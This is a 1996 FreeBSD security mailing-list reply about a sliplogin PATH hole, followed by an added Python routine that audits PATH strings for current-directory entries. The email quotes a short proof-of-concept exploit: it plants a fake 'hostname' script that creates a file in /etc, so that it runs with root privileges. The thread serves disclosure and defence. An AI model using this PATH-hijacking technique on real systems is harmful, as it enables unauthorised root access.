Date:      Mon, 12 Feb 1996 09:54:44 -0700
From:      Nate Williams <nate@sri.MT.net>
To:        Michael Constant <mconst@ocf.Berkeley.EDU>
Cc:        mconst@csua.berkeley.edu, nate@sri.MT.net, freebsd-security@freebsd.org
Subject:   Re: sliplogin hole?
Message-ID:  <199602121654.JAA19323@rocky.sri.MT.net>
In-Reply-To: <199602121036.CAA23693@maelstrom.Berkeley.EDU>
References:  <199602121036.CAA23693@maelstrom.Berkeley.EDU>

> Well, "PATH=:/bin:/usr/bin" contains the current directory ( . ) which
> is just as insecure as not changing the path at all :-)  But thanks for
> pointing out my misconception.

Hmmm.....  Maybe I am confused, although I see that piece of code used
in the 'sh' sources.

> The exploit as I stated it does work; it's written out in full below,
> in case I didn't explain it clearly in my original letter.
...
> 
> jrl@host% cd ~/bin
> jrl@host% cat > hostname
> #! /bin/sh
> touch /etc/i-am-root
> /bin/hostname
> ^D
> jrl@host% chmod 755 hostname
> jrl@host% sliplogin Sjrl
> starting slip login for Sjrl
> 
> ... and by this point, the deed is done.

I just tried this, and it didn't work on my box although I was allowed
to run sliplogin.  It dies with:
sliplogin[953]: ioctl (TIOCSCTTY): Operation not permitte

Which might not occur on a dial-in line.  Unfortunately, I'm unable to
test this out right now, but I will try it out from home.



Nate
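The point disputed above is how the shell reads `PATH=:/bin:/usr/bin`: the empty field before the first colon is searched as the current directory, exactly as if `.` had been written, which is why a program running with privileges must not inherit such a value. The following audit routine is an added example, not code from this thread or from sliplogin; it splits a PATH string the way `sh` does, reports every field that resolves relative to the current directory, and shows how such fields are dropped. The function names and the sample PATH strings are constructed for the illustration.

```python
"""Audit a PATH value for entries that are searched relative to the
current directory (empty fields and relative names) and strip them."""

import os


def split_path(path):
    """Split like the shell does: every field between colons is a
    directory, and an empty field (leading, trailing, or between two
    adjacent colons) means the current directory."""
    return path.split(":")


def audit_path(path):
    """Return a list of (index, entry, reason) for each unsafe field.

    Two cases are flagged:
      - an empty field, which the shell searches as the current directory;
      - a relative field such as '.' or 'bin', resolved from the current
        directory as well.
    """
    findings = []
    for index, entry in enumerate(split_path(path)):
        if entry == "":
            findings.append((index, entry,
                             "empty field is searched as the current directory"))
        elif not entry.startswith("/"):
            findings.append((index, entry,
                             "relative entry is resolved from the current directory"))
    return findings


def is_safe_path(path):
    """True when no field in PATH depends on the current directory."""
    return not audit_path(path)


def strip_unsafe(path):
    """Return PATH with every flagged field removed.

    This is a diagnostic helper: a privileged program should not repair
    an inherited PATH but replace it with a fixed list of absolute
    directories before running any external command."""
    unsafe = {index for index, _, _ in audit_path(path)}
    kept = [entry for index, entry in enumerate(split_path(path))
            if index not in unsafe]
    return ":".join(kept)


if __name__ == "__main__":
    # Constructed sample: the value discussed in the thread.
    for sample in (":/bin:/usr/bin", "/bin:/usr/bin", "/bin::/usr/bin:."):
        print(sample, "->", "safe" if is_safe_path(sample) else audit_path(sample))
    # Also look at the PATH of the current process.
    current = os.environ.get("PATH", "")
    for index, entry, reason in audit_path(current):
        print(f"PATH field {index} ({entry!r}): {reason}")
```

Run stand-alone, the script prints that `:/bin:/usr/bin` is flagged at field 0 while `/bin:/usr/bin` passes, and then audits the caller's own PATH. Note that `audit_path` treats a trailing colon and a doubled colon the same way as the leading one, since the shell does.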
